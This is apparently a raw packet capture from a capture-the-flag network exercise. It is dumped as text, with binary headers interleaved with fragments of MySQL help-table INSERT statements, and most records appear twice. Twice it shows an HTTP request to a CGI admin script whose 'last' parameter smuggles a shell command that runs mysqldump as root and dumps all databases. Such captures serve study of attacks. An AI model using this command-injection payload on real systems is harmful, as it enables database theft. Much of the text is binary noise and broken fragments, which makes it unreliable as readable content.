TCbb0`BiET@/Ԁo0SE SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. TC"bbBi0`ET@/p܂Ao0E ) SIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])]C"bb0`BiET@/Ԁo0SE ) SIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])]C#ZZBi0`EL@/܂Sŀo0E4@? 3 Pb|J); )C#ZZ0`BiEL@/go0AE4@@ 3 Pb|J); )C$ZZBiBaEL@/fo0 o0E4@)o Y P+$l-/̾ G4'7=wC($ZZʪBiEL@/o0o0oE4@@o Y P+$l-/̾ G4'7=wC'bbBi0`ET@/p܂Ao0E<[@?  3Pք  ) [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER priC'bb0`BiET@/Ԁo0SE<[@@  3Pք  ) [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER priC+bbBi0`ET@/p܂Ao0E<\@?  3P։  ) vilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10C+bb0`BiET@/Ԁo0SE<\@@  3P։  ) vilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10C\-ZZBi0`EL@/܂Sŀo0E4@? 3 Pb컆Z)* )Cn-ZZ0`BiEL@/go0AE4@@ 3 Pb컆Z)* )CJ0bbBi0`ET@/p܂Ao0E<]@?  3P֎ A ) -04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue thiC\0bb0`BiET@/Ԁo0SE<]@@  3P֎ A ) -04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue thiC4bbBi0`ET@/p܂Ao0E<^@?  3P֓  ) s statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyIC4bb0`BiET@/Ԁo0SE<^@@  3P֓  ) s statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyIC9bbBi0`ET@/p܂Ao0E<_@?  3P֘ [ ) SAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the C$9bb0`BiET@/Ԁo0SE<_@@  3P֘ [ ) SAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the C9ZZBi0`EL@/܂Sŀo0E4@? 3 Pb컐j) )C9ZZBi0`EL@/܂Sŀo0E4J@?{ 3 Pyb.5\ )'C9ZZ0`BiEL@/go0AE4@@ 3 Pb컐j) )C9ZZ0`BiEL@/go0AE4J@@{ 3 Pyb.5\ )'C :""Bi0`E@/Sŀo0EJ@?ڱ 3 Pyb.5 )'GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C':""0`BiE@/go0AEJ@@ٱ 3 Pyb.5 )'GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C<bbBi0`ET@/p܂Ao0E<`@?  3P֝  ) number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined C =bb0`BiET@/Ԁo0SE<`@@  3P֝  ) number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined Cw=ZZBi0`EL@/܂Sŀo0E4y\@?F  DPВT6Aa 0#7=vC=ZZʪBiEL@/o0o0oE4y\@@F  DPВT6Aa 0#7=vCj?ZZBiʪEL@/o0oo0E4L@@ؼ PD6AВTƳ 7=w0#C{?ZZ0`BiEL@/܀o0SE4L@@ؼ PD6AВTƳ 7=w0#CAbbBi0`ET@/p܂Ao0E SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric valueCAbb0`BiET@/Ԁo0SE SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric valueCXBZZBi0`EL@/܂Sŀo0E4@? 3 Pb컚z) )!C`BZZBi0`EL@/܂Sŀo0E4@?c 3 P()b1fO )'CnBZZ0`BiEL@/go0AE4@@ 3 Pb컚z) )!CxBZZ0`BiEL@/go0AE4@@b 3 P()b1fO )'CB""Bi0`E@/Sŀo0E@?b 3 P()b1f )'GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive CB""0`BiE@/go0AE@@a 3 P()b1f )'GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C?FbbBi0`ET@/p܂Ao0E SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geoCFFZZBi0`EL@/Plo0E4/}@?  3P;D e y'CVFbb0`BiET@/Ԁo0SE SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geoCbFZZ0`BiEL@/܀o0SE4/}@@  3P;D e y'CJbbBi0`ET@/p܂Ao0E SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\CJbb0`BiET@/Ԁo0SE SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\CObbBi0`ET@/p܂Ao0E SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nCOZZBi0`EL@/܂Sŀo0E4˘@?Y 3 9PZ )yaCObb0`BiET@/Ԁo0SE SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nCOZZ0`BiEL@/Eo0lE4˘@@X 3 9PZ )yaCSbbBi0`ET@/p܂Ao0E SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\CTXZZBi0`EL@/< o0E4@??  PGs ;eGCYXBi0`E@/ک o0E@?>  PG=` ;eGGET /~acquire/cgi-bin/get.php?ip=1523 HTTP/1.1 Accept-Encoding: identity Host: georgia4.ctf Connection: close User-agent: Python-urllib/2.4 CiXbb0`BiET@/Ԁo0SE SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\CvXZZ0`BiEL@/g܀o0IE4@@>  PGs ;eGCX0`BiE@/gIo0IE@@=  PG=` ;eGGET /~acquire/cgi-bin/get.php?ip=1523 HTTP/1.1 Accept-Encoding: identity Host: georgia4.ctf Connection: close User-agent: Python-urllib/2.4 C/]ZZBi0`EL@/܂Sŀo0E4\/@?P 3 Pu}U$ )'CB]ZZ0`BiEL@/go0AE4\/@@P 3 Pu}U$ )'C_bbBi0`ET@/p܂Ao0E<'@?UP  3Pğu}U O ) [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT 